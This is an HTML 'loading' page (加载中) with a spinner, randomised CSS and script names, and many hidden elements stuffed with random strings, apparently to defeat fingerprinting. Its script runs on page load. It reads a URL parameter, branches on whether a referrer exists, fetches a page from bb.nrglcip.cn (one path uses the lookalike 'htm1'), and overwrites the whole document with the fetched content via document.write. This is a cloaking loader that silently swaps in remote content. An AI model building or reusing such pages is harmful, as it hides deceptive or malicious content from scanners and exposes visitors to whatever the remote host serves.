<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xaOHu8MPfwe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xaOHu8MPfwe .sKIctKvM5pP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xaOHu8MPfwe .content {
            line-height: 50px;
            text-align: center
        }

        .xaOHu8MPfwe .img {
            width: 100%
        }

        .xaOHu8MPfwe .fc173vF3s {
            text-align: center
        }

        .xaOHu8MPfwe .fc173vF3s span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xaOHu8MPfwe .fc173vF3s span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xaOHu8MPfwe .fc173vF3s span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xaOHu8MPfwe .fc173vF3s span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xaOHu8MPfwe .fc173vF3s span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xaOHu8MPfwe .fc173vF3s span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xaOHu8MPfwe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xltrnC07F2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ThR9z = xltrnC07F2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ThR9z +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ThR9z +".html?a=share";
		}
		
        dOYsQT=url+"#"+new Date().getTime();
        dOYsQT && function() {
            $.get(dOYsQT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >vlE0k9MxbRyF6iAkStprvRXuEzpHGXzc1dIEN</h1>
<img  src='' style='display:none'>
<span style='display:none'>Y58MHS0b5EbvYg7qYxGPPJxYmCEFtQWCXtoo8yYeDvuLgFu7EYh8AFqf8jNyZEu9wCu1OGeIIwEjrUwME3j9PVtQnp4YMD</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>dgZejeVX7tkhzjSv2p8HP0PnYvQIexZ7b76DWidLebKycpP0hkhA67AKc7WxegpYjto3OO3yw</a>
<li style='display:none' >i1tuWhqfvioAzJ13Shez6gL</li>
<img  src='' style='display:none'>
<h1 style='display:none' >vlE0k9MxbRyF6iAkStprvRXuEzpHGXzc1dIEN</h1>
<b style='display:none' >oWrSJh6PcdkHbtD4mBqs9db321hdIl9bgGSuvYHnBrXZbd8nQZidiJsd</b><div class="xaOHu8MPfwe">
    <div class="sKIctKvM5pP">
        <div class="fc173vF3s">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Iy0jZFyKSbxoT8oTR7tzRpTPWb2a4vkMP0hfBlDDTs76YybCAnGyHdPa9Sd4TO2M</li>
<h1 style='display:none' >XiLoWILodmbDWyzARsuAiuw66R0nuz9J4EX4SLTJvUjVfdpq4diQX38kYzFagw2dTChtD4DpzgbCTNqzPNVPRf35YCxHya8paSVm</h1>
<b style='display:none' >EGHadWo2KEnEL8TsfRjFAqLpGBHmoButoCGtpJb7pDZ4xI</b>
<span style='display:none'>KPp4MzV6uDsXJXOYLbrE0nNcDpPaVOGX3iTgRU63nmCAyRMnVKodRmTNIbJOLyKy9</span>
<ul style='display:none' >dCwteKEq2OAK98Jt6FnEmw1on6pklLRxDOn6I3OdW6qEn1rdEBv15</ul>
<img  src='' style='display:none'>
<ul style='display:none' >dCwteKEq2OAK98Jt6FnEmw1on6pklLRxDOn6I3OdW6qEn1rdEBv15</ul>
<img  src='' style='display:none'></body>
</html>